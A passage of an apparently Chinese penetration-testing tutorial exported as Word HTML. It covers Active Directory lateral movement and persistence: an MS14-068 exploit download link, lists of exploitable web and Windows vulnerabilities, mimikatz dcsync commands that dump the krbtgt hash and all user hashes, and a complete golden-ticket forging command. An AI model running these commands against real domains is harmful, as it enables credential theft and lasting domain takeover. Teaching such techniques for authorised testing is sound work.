                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">kerberos::ptc <a href="mailto:[email protected]"><span style="color:windowtext;text-decoration:none;text-underline:none;">[email protected]</span></a></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection32;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="323" src="https://www.2k8.org/content/uploadfile/202203/17/2a064b7a.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">4</span>、 再次访问域控<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1059" style="position:absolute;margin-left:90pt;margin-top:7.4pt;width:418pt;height:188pt;z-index:251689984;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:188.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1088" type="#_x0000_t75" style="width:418pt;height:188.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image114.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="560" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/84db0a11.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.5pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:5.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">MS14-068 </span>下载地址:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:Times New Roman,serif;font-size:12.0pt;"><a href="https://github.com/abatchy17/WindowsExploits/raw/master/MS14-068/MS14-068.exe"><span style="color:blue;font-family:等线;font-size:10.5pt;">https://github.com/abatchy17/WindowsExploits/raw/master/MS14-068/MS14-068.exe</span></a></span><span lang="EN-US" style="color:blue;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h2 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:44.8pt;">
                        <a name="4.2.6 web漏洞"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.6<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span lang="EN-US">web<span style="letter-spacing:-.2pt;"> </span></span><span style="letter-spacing:-.2pt;">漏洞<span lang="EN-US"></span></span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        当我们通过以上方法无法进行横向移动的时候,只能回到<span lang="EN-US"> web</span>。通过扫描内网<span lang="EN-US"> web </span>应用,通过<span lang="EN-US">web </span>漏洞再进一步进行横向移动,常见能直接获得<span lang="EN-US">webshell </span>的漏洞如下:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">struts2<span style="letter-spacing:-.15pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">远程代码执行<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">weblogic<span style="letter-spacing:-.15pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">反序列化漏洞<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">weblogic<span style="letter-spacing:-.15pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">弱口令<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">tomcat<span style="letter-spacing:-.15pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">弱口令<span lang="EN-US"></span></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;letter-spacing:-.15pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection33;">
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.15pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">shiro<span style="letter-spacing:-.15pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.15pt;">远程代码执行<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.2pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">phpstudy<span style="letter-spacing:-.2pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.2pt;">后门<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.2pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">fastjson<span style="letter-spacing:-.2pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.2pt;">远程代码执行<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;letter-spacing:-.2pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">sql<span style="letter-spacing:-.2pt;"> </span></span><span style="font-size:10.5pt;letter-spacing:-.2pt;">注入<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;">等等<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.35pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:9.0pt;">&nbsp;</span>
                </p>
                <h2 style="margin-left:48.35pt;punctuation-wrap:simple;tab-stops:48.4pt;text-indent:-42.4pt;">
                        <a name="4.2.7 系统漏洞"></a><span lang="EN-US" style="letter-spacing:-.05pt;"><span>4.2.7<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>系统漏洞<span lang="EN-US"></span>
                </h2>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        当内网没有<span lang="EN-US"> web </span>应用的时候,可以尝试通过一些系统漏洞来进行横向移动,通常不建议使用此类漏洞,因为很容易导致服务器蓝屏,常见漏洞如下:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.5pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">MS08-067</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">MS17-010</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span lang="EN-US" style="font-size:10.5pt;">CVE-2019-0708</span>
                </p>
                <p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
                        <span lang="EN-US" style="font-family:Wingdings;font-size:10.5pt;"><span>Ø<span style="font:7.0pt &quot;">&nbsp; </span></span></span><span style="font-size:10.5pt;">等等<span lang="EN-US"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <h1 style="line-height:normal;punctuation-wrap:simple;tab-stops:51.1pt;">
                        <a name="5、 权限维持"></a><span lang="EN-US">5</span>、<span lang="EN-US"><span>&nbsp; </span></span>权限维持<span lang="EN-US"></span>
                </h1>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.5pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:14.5pt;">&nbsp;</span></b>
                </p>
                <h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
                        <a name="5.1 黄金票据"></a><span lang="EN-US"><span>5.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span>黄金票据<span lang="EN-US"></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.75pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        黄金票据(<span lang="EN-US">Golden Ticket</span>)是有效的<span lang="EN-US"> TGT(TicketGranting Ticket)</span>票据,是由<span lang="EN-US"> KERBEROS </span>账户(<span lang="EN-US">KBRTGT</span>)加密的。用于域控权限掉后,想再重新获取。因为域管的密码可能更改, 通常<span lang="EN-US"> kbrtgt </span>账户不会有人去过问。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <h3 style="margin-bottom:.0001pt;margin-left:46.2pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
                        <a name="5.1.1 制作黄金票据的前提条件"></a><span lang="EN-US" style="font-family:等线;letter-spacing:-.05pt;"><span>5.1.1<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><span style="font-family:等线;">制作黄金票据的前提条件<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、域名称<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、域的<span lang="EN-US">SID</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、域的<span lang="EN-US">KRBTGT </span>账户的密码<span lang="EN-US"> hash </span>值<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">4</span>、伪造的用户名,可以是任意用户甚至是不存在的用户<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">&nbsp;</span>
                </p>
                <h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
                        <a name="5.1.2 黄金票据利用"></a><span lang="EN-US" style="font-family:等线;letter-spacing:-.05pt;"><span>5.1.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><span style="font-family:等线;">黄金票据利用<span lang="EN-US"></span></span>
                </h3>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、导出<span lang="EN-US"> krbtgt </span>密码<span lang="EN-US"> hash</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection34;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="610" src="https://www.2k8.org/content/uploadfile/202203/17/4e4e5178.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        导出所有域内用户密码<span lang="EN-US"> hash </span>值:<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">mimikatz#lsadump::dcsync /domain:adtest.com /all /csv</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection35;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="552" height="308" src="https://www.2k8.org/content/uploadfile/202203/17/a8ca76f3.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、获取域<span lang="EN-US"> SID</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:26.55pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1060" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:36.3pt;width:414pt;height:114pt;z-index:251691008;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:114.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1089" type="#_x0000_t75" style="width:413.5pt;height:114pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image120.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/b643f7cc.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
在导出<span lang="EN-US"> krbtgt </span>的<span lang="EN-US"> hash </span>的时候已经包含了域<span lang="EN-US">SID</span>,也可以用以下命令来查看域<span lang="EN-US"> SID whoami /all</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.25pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">3</span>、伪造黄金票据<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.45pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.7pt;margin-top:0cm;punctuation-wrap:simple;tab-stops:76.4pt 160.6pt 232.2pt 251.65pt 353.85pt;text-autospace:none;">
                        <span lang="EN-US">mimikatz.exe<span>&nbsp;&nbsp;&nbsp; </span>privilege::debug<span>&nbsp;&nbsp;&nbsp; </span>"kerberos::golden<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>/domain:adtest.com<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><span style="letter-spacing:-.05pt;">/sid:S-1-5-21- </span>3418659180-3421952656-1938706522<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><span style="letter-spacing:-.05pt;">/target:WIN-9P499QKTLDO.ADTEST.COM</span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.65pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">/service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt"</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        这里可以不指定<span lang="EN-US">target </span>和<span lang="EN-US">service</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.8pt;margin-top:0cm;punctuation-wrap:simple;tab-stops:122.6pt 232.75pt;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">kerberos::golden<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>/domain:adtest.com<span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><span style="letter-spacing:-.05pt;">/sid:S-1-5-21-3418659180-3421952656- </span>1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa<span style="letter-spacing:-.1pt;"> </span>/ptt</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection36;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="442" src="https://www.2k8.org/content/uploadfile/202203/17/cdba4a13.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.45pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:2.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.85pt;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
